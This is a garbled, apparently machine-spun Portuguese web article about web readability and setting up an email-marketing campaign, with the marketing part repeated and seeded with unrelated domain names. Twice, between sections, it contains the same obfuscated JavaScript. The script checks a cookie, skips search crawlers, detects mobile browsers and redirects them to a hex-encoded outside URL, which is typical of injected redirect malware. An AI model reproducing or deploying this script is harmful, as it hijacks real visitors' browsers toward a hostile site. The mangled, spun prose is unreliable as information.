Como configurar sua prA?pria campanha de marketing por e-mail

A net A� claramente adequada para a apresentaA�A?o de papeis curtos, contendo muitos hyperlinks. No caso de 1 texto comprido, nA?o substituirA? um livro ou uma revista (pelo menos no momento). No entanto, se houver necessidade por fazer upload de material mais longo, ele deverA? ser dividido em numerosas partes e a variaA�A?o para impressA?o ou download deverA? ser disponibilizada sob a forma de arquivos HTML ou RTF. 1o de tudo, o texto deve ser lA?cido. Por meio de parA?grafos curtos, multiplos estilos (nA�veis) de tA�tulos e listas numeradas, podemos melhorar a legibilidade do texto. Palavras importantes devem ser destacadas em negrito ou em itA?lico e, ao mesmo tempo, sublinhado deve ser evitado, pois A� reservado para links. O texto deve ser estA?tico, ainda que possamos descobrir pA?ginas da web com mensagens curtas na forma do faixa por rolagem. Excepcionalmente, um texto em movimento A� lido mais tardiamente. Nesse caso, o retorno A�s informaA�A�es selecionadas igualmente A� prejudicado. VocA? deve esperar atA� que as informaA�A�es restantes tenham passado. A forma tais como os parA?grafos sA?o ajustados tambA�m influencia o ritmo da leitura. Sugere-se alinhar A� esquerda ou justificar, porque este texto formatado de tal maneira lA? muito muito mais facilmente. O texto nA?o deve ser exibido em toda a largura da tela. Muitas vezes, permite o leitor omitir linhas ou descer uma linha abaixo. Linhas contendo no mA?ximo 10 palavras sA?o as muito mais fA?ceis por ler. A cor do texto deve contrastar com a cor do programa de fundo. Um artigo preto contra um fundo branco A� o muito mais legA�vel. A combinaA�A?o inversa tambA�m A� especialmente boa, ainda assim, no caso de textos mais longos, desencoraja o usuA?rio e diminui este ritmo da leitura. O uso de cores brilhantes A� muito cansativo para os olhos. Por fato, apesar de chamarem nossa sentido, desestimulam depois um curto perA�odo por tempo. O plano por fundo deverA? simples, visto que os grA?ficos dificultam a distinA�A?o das linhas por caracteres e formas de palavras. Ainda assim, se decidirmos usar 1 padrA?o, ele deve ser demasiado sutil. No caso por tA�tulos do seA�A�es, temos que evitar cores. O texto colorido A� reservado para referA?ncias. O usuA?rio nA?o lA? um site linha por linha, mas sim passa por ele. Por isso, o conteA?do do site deve ser dividido em vA?rias partes, cada uma das quais deve receptar um tA�tulo. Vale a pena realizar alguns espaA�os vazios entre blocos de texto. 1 documento dividido em partes A� lido mais facilmente do que 1 texto escrito sem espaA�os. As A?nicas desvantagens dessa soluA�A?o sA?o a extensA?o do texto e a necessidade de sua rolagem contA�nua. Nesses casos, recomenda-se colocar uma referA?ncia que permita voltar a tela.

SeleA�A?o apropriada de fontes

A�s vezes, hA? discussA�es sobre a seleA�A?o do tipos por fonte por conta da divisA?o em fontes nenhumas serifas (por exemplo, Verdana) e serif (por exemplo, Times New Roman). A� especialmente comumente conhecido que as pessoas preferem ver textos escritos por meio de fontes serif. Isso resulta do fato de que as serifas facilitam a movimentaA�A?o de um personagem para outro, o de que aumenta sua legibilidade. O presente princA�pio, no entanto, aplica-se a documentos em papel. A baixa sentido torna as fontes com serifa dificilmente legA�veis na tela. A� especialmente do grande mais valia no caso de textos escritos por meio de fontes pequenas. Juntamente usando o crescente nA?mero do usuA?rios que possuem monitores de alta definiA�A?o, esse princA�pio terA? menos mais valia. No entanto, por enquanto, fontes sans-serif sA?o mais preferA�veis. Certamente, o tamanho da fonte tem um impacto na legibilidade. Fonte tamanho pelo menos 10 pontos deve ser utilizado para o texto bA?sico. A� essencial evitar letras maiA?sculas pelo texto. POST ESCRITO NESSE FORMA Foi LIDO EM CERCA DE 10% MAIS TARDIAMENTE. NA?o apenas dois tipos de fonte (para textos de papeis e tA�tulos) ou trA?s no caso de textos especiais, por ex. lei do plano, deve ser usado.

GrA?ficos, ilustraA�A�es e animaA�A�es

Os grA?ficos, assim como estes multimA�dia, devem ser colocados nos sites quando eles realmente permitem que este usuA?rio entenda melhor as informaA�A�es apresentadas ou melhoram as qualidades estA�ticas da pA?gina da web. Os objetivos do projeto grA?fico sA?o informar, facilitar a movimentaA�A?o do recursos, contudo nA?o absorver atenA�A?o. Se nA?s usar grA?ficos, em vez do muitas fotos, podemos usar um vA?rias vezes. NA?o sA? irA? acelerar o carregamento da pA?gina, contudo tambA�m garantirA? a coesA?o visual do site. Para fazer upload de uma imagem, devemos nos lembrar de juntar o dote ALT, que permitirA? ao usuA?rio olhar o de que uma determinada imagem exprime antes de ser exibida. AlA�m disso, navegadores para cegos podem ver arquivos ALT em voz alta. Imagens de suplementos desempenham um papel vital no desenvolvimento de tomada de tenA�A?o sobre sua compra. Os usuA?rios de que visitam lojas on-line estA?o mais dispostos a esperar por muito mais alguns segundos para olhar como A� o resultado em que estA?o interessados. No entanto, este princA�pio de um nA?mero limitado de imagens e ilustraA�A�es deverA? aplicado em pA?ginas por nA�vel superior. No sitio que exprime um produto, alA�m da descriA�A?o do resultado, devemos fazer o upload de uma pequena foto (leia-se: “light”) ou uma referA?ncia a uma pA?gina que exprime seu formato maior ou fotografias adicionais na forma do uma galeria. Todos os tipos do esquemas, diagramas e grA?ficos constituem outros elementos grA?ficos, que facilitam a compreensA?o e assimilaA�A?o do conteA?do da pA?gina, e de que sA?o preferidos pelos usuA?rios por causa dessas qualidades. Estes A�cones igualmente sA?o bastante usados. Ainda assim, devemos lembrar que a aparA?ncia deles nem a todos os momentos pode ser interpretada de maneira idA?ntica e vale a pena descrevA?-los de modo a nA?o induzir em erro este destinatA?rio. Por outro lado, nA?o foi aconselhA?vel usar o menu grA?fico e os botA�es. Prolonga este carregamento da pA?gina e, alA�m disso, causa problemas adicionais, p. quando outra categoria de menu A� adicionada derivado A? reestruturaA�A?o do site. Em seguida, o webmaster deve entrar em contato com o designer grA?fico que comeA�a a procurar por arquivos por origem. A situaA�A?o tA?m a possibilidade de se tornar mais complicada quando os grA?ficos sA?o projetados por uma pessoa de fora, que nA?o definiu diretrizes para o design de elementos grA?ficos. As animaA�A�es constituem outra forma comumente usada, cujo objetivo foi chamar a atenA�A?o do usuA?rio. Ainda assim, eles devem ser utilizados raramente, como A� complicado se concentrar em um texto com muitos sinais em movimento. Se o visitante puder responder afirmativamente a questA?o por saber se A� possA�vel expressar sua mensagem isento animaA�A?o, entA?o vocA? deve renunciar aos grA?ficos animados. Se possui que estar presente na pA?gina web, nA?o deverA? muito intoleravel. Ele incomoda o usuA?rio e dificulta o foco na parcela principal da pA?gina. Foi por isso de que, apA?s diversas repetiA�A�es, deve parar.

A pA?gina principal

A� uma vitrine do site, quando um usuA?rio precisa achar uma resposta para as seguintes perguntas: “Que gA�nero de saber A� apresentada no sitio? “, “Que conteA?do ela oferece? ” A� portanto que, www.ibislerplastik.com.tr para alA�m do nome e logotipo de destaque da empresa, deve reprimir o catA?logo de seA�A�es, um breve resumo de principais informaA�A�es, bem como o mA?dulo do pesquisa. Igualmente constitui 1 bom lugar para informar sobre promoA�A�es, no entanto, eles nA?o devem ocupar demasiado espaA�o. Sua prA?pria principal funA�A?o deve ser familiarizar o usuA?rio com sua A?rea por assunto, incentivA?-lo a entrar em outras pA?ginas da Web, mas antes de mais nada, para possibilitar uma pesquisa adicional por meio de um sistema de navegaA�A?o simples e intuitivo.

NA?o apenas 1 projeto

A� impossA�vel discutir todos estes princA�pios por funcionalidade do site em um post. A� portanto que compensa se familiarizar com outras publicaA�A�es elaborando sobre este assunto. Inumeras vezes, acontece de que a feiA�A?o de praticamente as regras ao mesmo tempo nA?o A� viA?vel, especialmente ao projetar sitios muito complicados. Em tais casos, foi necessA?rio renunciar a alguns princA�pios. Elementos nA?o diretamente relacionados usando o design da pA?gina da web, por exemplo definiA�A?o de tela, tamanho do fonte delimitado pelo usuA?rio ou um navegador utilizado, tambA�m tA?m um impacto na funcionalidade. O site deve ser testado antes de ser publicado na Internet. A conclusA?o e implementaA�A?o do projeto nA?o significa de que podemos esquecer a funcionalidade. Um porreiro criador deve monitorar as suas pA?ginas da Web a esse respeito o tempo todo.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Tais como configurar sua prA?pria prA?pria campanha de marketing por e-mail

Qual A� este maior erro que as pessoas cometem em suas campanhas de email marketing? NA?o A� uma estratA�gia ruim – embora a mA? estratA�gia mesmo que um fator importante para arruinar qualquer potencial de lucro que um site, produto ou ideia possa ter. E nA?o, nA?o A� carA?ncia de leads – construir sua lista A� surpreendentemente fA?cil, uma vez que vocA? sabe o sentido certo para fazA?-lo. O maior erro que os indA�viduos cometem foi o seguinte: elas assumem que este e-mail marketing deve ser deixado a cargo dos entendidos na matA�ria e nA?o se preocupe em aprender nada a respeito de isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sites por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas anuncios de marketing por e-mail. E nA?o, o envio de boletins informativos de todos os meses sobre atualizaA�A�es no sitio nA?o constitui um e-mail marketing. E-mail marketing foi um processo de geraA�A?o de negA?cios atravA�s da manutenA�A?o por uma lista de contatos de e-mail – pessoas que se inscrevem na sua lista por um motivo ou outro (geralmente para adquirir acesso a informaA�A�es ou a algum outro recurso). Uma campanha executada corretamente envolve pelo menos o seguinte: * CriaA�A?o do um relacionamento positivo e responsivo usando sua lista. * Fornecer sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de excelA?ncia primeiro, peA�a o numerA?rio deles ainda mais tarde). * Promover produtos direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o pela qual eles se inscreveram em sua prA?pria lista.

VocA? verA? nessa lista do pontos que o simples envio de ofertas promocionais para muitos endereA�os do e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso foi spam. NA?o seja tais como a maioria de pessoas na Internet. Se vocA? estacionaestaficafixa jazepararpermanecequeda operando em um nicho on-line, foi quase garantido que o visitante esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a este esforA�o para criar sua prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* 1 autoresponder confiA?vel.

* 1 formulA?rio do captura por chumbo / pA?gina do destino.

* Significa trazer trA?fego para essa pA?gina de fatalidade. * 1 conjunto de mensagens prA�-escritas para sua prA?pria lista.

* Um plano de marketing por email.

Se isso parece em demasia, nA?o se preocupe. Todos os cinco pontos sA?o explicados detalhadamente abaixo.

O autoresponder Um autoresponder A� especialmente a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas tambA�m pode automatizar o desenvolvimento de envio de e-mails para sua prA?pria lista. O visitante pode carregar um conjunto de e-mails / mensagens para sua lista no seu autoresponder, e o script enviarA? os e-mails automaticamente nas datas que o visitante especificar. Estes dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e espetaculares caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e olhar como eles funcionam eu sugiro de que vocA? se inscreva para a versA?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� deveras simples. Tanto o AWeber quanto o GetResponse tA?m um procedimento simples do inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu processo de gerenciamento de listas.

Mensagens prA�-escritas O gerenciamento de listas A� realmente simples com autoresponders. O visitante pode prA�-carregar sua conta com respostas de modelo para qualquer uma de seguintes ocasiA�es: * Quando alguA�m se inscrever por meio do um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua prA?pria lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para este seu endereA�o de email do autoresponder (pode configurar esta recado para dizer ao remetente que irA? responder dentro de um determinado perA�odo de tempo ou redirecionA?-lo para 1 endereA�o por email diferente). AlA�m disso, vocA? pode vir a escrever muitos e-mails com antecedA?ncia iptvbr.tv (no caso de vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? anseia que cada mensagem mesmo que enviada e seu trabalho estA? concluA�do. O autoresponder cuida por todo o resto. O prA�-carregamento por mensagens no seu autoresponder foi uma A?tima maneira do agendar 1 curso por email informativo ou se vocA? quiser enviar muitos emails promocionais para este mesmo resultado. A maioria destes autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho bastante mais simples. Tudo o que o visitante realmente precisa A� personalizar esses modelos, se preciso, e depois carregar as suas prA?prias mensagens.

Landing Page

Muita gente simplesmente usam uma inscriA�A?o para o nosso boletim informativo? gA�nero de caixa em suas pA?ginas importantes e esperamos que as pessoas entrem na loja. NA?o A� assim que funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no que vocA? tem a dizer. Isso significa que 1o vocA? possui que educar seus assinantes em potencial para este que eles tA?m a ganhar entregando seus endereA�os de e-mail para o visitante. Configure uma pA?gina separada em seu website como uma pA?gina do destino. Nesta pA?gina, vocA? incluiria uma descriA�A?o do seu boletim informativo, bem como estes principais pontos fortes para seus assinantes se inscreverem pelo boletim informativo (um relatA?rio gratuito a cerca de atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer de que seja este seu nicho). A chave aqui A� convencer este leitor que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, como A� este lugar ideal para obter as mais proveitosos informaA�A�es a respeito de esse campo. E, claro, fornecer 1 formulA?rio bronco para estes visitantes preencherem e se inscreverem em seu boletim informativo.

Direcionar trA?fego

AtA� agora, vocA? estacionaestaficafixa jazepararpermanecequeda pronto para construir sua prA?pria lista e aumentar as vendas atravA�s de seu autoresponder. Mas primeiro, vocA? precisa direcionar o trA?fego (leia vizinhos reais) para sua pA?gina de fatalidade para que eles permitam se inscrever em sua prA?pria lista. Veja uma breve discussA?o do algumas tA?ticas que vocA? pode usar:

* Escrever e enviar artigos em um diretA?rio do post de nicho.

Certifique-se de incluir sua caixa do recurso no final do post, com 1 texto descrevendo seu curso por e-mail e um link voltando para sua pA?gina por destino. Isso A� deveras elementar, porA�m ainda A� especialmente surpreendente como poucas pessoas acabam aproveitando-se disso, usando a certeza de que vocA? se concentra nos importantes sites ricos em conteA?do do seu nicho ao enviar esses artigos.

* Se o visitante espera lucrar significativamente usando seus assinantes (na prA?xima liA�A?o, como vocA? tA?m a possibilidade de calcular este valor da vida eficaz do seu assinante), o visitante pode gastar algum dinheiro na criaA�A?o de sua lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de destino. A chave aqui A� especialmente fazer lances em frases muito especA�ficas de duas e 3 palavras, para que nA?o apenas seu trA?fego seja segmentado, contudo tambA�m de que vocA? possa obter esses cliques usando a certeza de nA?o pagar 1 preA�o alto por clique ( 1 visitante), caso contrA?rio, este processo pode sair atravA�s culatra em vocA?.

* Simples tais como parece, certifique-se de facilitar o seu boletim informativo em seu sitio. NA?o se limite a escolher um link em todas as pA?ginas – inclua destemido texto e realmente explique em poucas palavras o que o boletim informativo oferece (como um anA?ncio de PPC).

* Oferecer um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma seA�A?o do seu site (onde vocA? guarda o porreiro conteA?do) ou atA� mesmo um relatA?rio para download. Este foi de longe o mais comum de que os funcionA?rios de marketing usam para construir sua prA?pria lista.

* Se o visitante tiver 1 discurso do vendas em seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de perigos para testA?-lo e testemunhar se vocA? realmente tA?m a possibilidade de cumprir qualquer reivindicaA�A?o produzida no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar os prA?s e contras e deliberar em muito sobre as decisA�es de compra (especialmente decisA�es do compra caras). Ao proporcionar a eles a opA�A?o de se inscrever no seu boletim informativo, vocA? garante uma trilha interna para a compra ou nA?o de debate em as suas mentes e estA? em posiA�A?o do ganhar sua confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Como configurar sua prA?pria prA?pria campanha de marketing por e-mail

Qual A� este maior engano que os indA�viduos cometem em suas anuncios de email marketing? NA?o A� uma estratA�gia ruim – embora a mA? estratA�gia seja um fator importante para arruinar qualquer potencial de lucro que um site, produto ou ideia possa ter. E nA?o, nA?o A� falta de leads – obter sua lista A� surpreendentemente fA?cil, visto que vocA? sabe o sinal certo para fazA?-lo. Este maior engano que as pessoas cometem A� o seguinte: elas assumem que este e-mail marketing deve ser deixado a cargo dos especialistas e nA?o se preocupe em aprender nada sobre isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sites por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas anuncios de marketing por e-mail. E nA?o, o envio de boletins informativos mensais sobre atualizaA�A�es no sitio nA?o constitui um e-mail marketing. E-mail marketing A� um processo de geraA�A?o de negA?cios atravA�s da manutenA�A?o por uma lista de contatos de e-mail – pessoas que se inscrevem na sua lista por 1 motivo ou outro (geralmente para conseguir acesso a informaA�A�es ou a algum outro recurso). Uma campanha executada corretamente envolve pelo menos este seguinte: * CriaA�A?o do um relacionamento positivo e responsivo usando sua lista. * Prover sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de qualidade primeiro, peA�a o valor deles muito mais tarde). * Promover suplementos alimentares direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o pela qual eles se inscreveram em sua prA?pria lista.

O visitante verA? nessa lista de pontos que o simples envio por ofertas promocionais para vA?rios endereA�os do e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso foi spam. NA?o seja como a maioria de pessoas na Internet. Se vocA? permanecequeda operando em um nicho on-line, foi quase garantido que o visitante esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a este esforA�o para criar sua prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* Um autoresponder confiA?vel.

* Um formulA?rio por captura de chumbo / pA?gina do destino.

* Significa trazer trA?fego para essa pA?gina de destino. * Um conjunto do mensagens prA�-escritas para sua prA?pria lista.

* Um programa de marketing por email.

Se isso parece demais, nA?o se preocupe. Todos os 5 pontos sA?o explicados detalhadamente abaixo.

Este autoresponder 1 autoresponder A� a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas tambA�m igualmente similarmente identicamente conjuntamente pode automatizar o processo de envio de e-mails para sua lista. O visitante pode carregar um conjunto de e-mails / mensagens para sua prA?pria lista no seu autoresponder, e o script enviarA? estes e-mails automaticamente nas datas que o visitante especificar. Estes dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e excelentes caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e olhar como eles funcionam eu sugiro que vocA? se inscreva para a variaA�A?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� em muito simples. Tanto o AWeber quanto o GetResponse tA?m um procedimento simples por inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu desenvolvimento de gerenciamento de listas.

Mensagens prA�-escritas O gerenciamento de listas A� deveras simples usando autoresponders. O visitante pode prA�-carregar sua conta com respostas de modelo para qualquer uma de seguintes ocasiA�es: * Quando alguA�m se inscrever por meio do um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua prA?pria lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para o seu endereA�o de email do autoresponder (pode configurar esta recado para dizer ao remetente que irA? responder dentro de um determinado perA�odo de tempo ou redirecionA?-lo para um endereA�o por email diferente). AlA�m disso, vocA? tA?m a possibilidade de escrever vA?rios e-mails usando antecedA?ncia smegenius.com (no caso de vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? deseja que cada mensagem seja enviada e seu manejorefregatrA?fego estA? concluA�do. O autoresponder cuida do todo este resto. Este prA�-carregamento por mensagens no seu autoresponder A� especialmente uma A?tima maneira por agendar 1 curso de email informativo ou se vocA? quiser enviar vA?rios emails promocionais para este mesmo resultado. A maioria dos 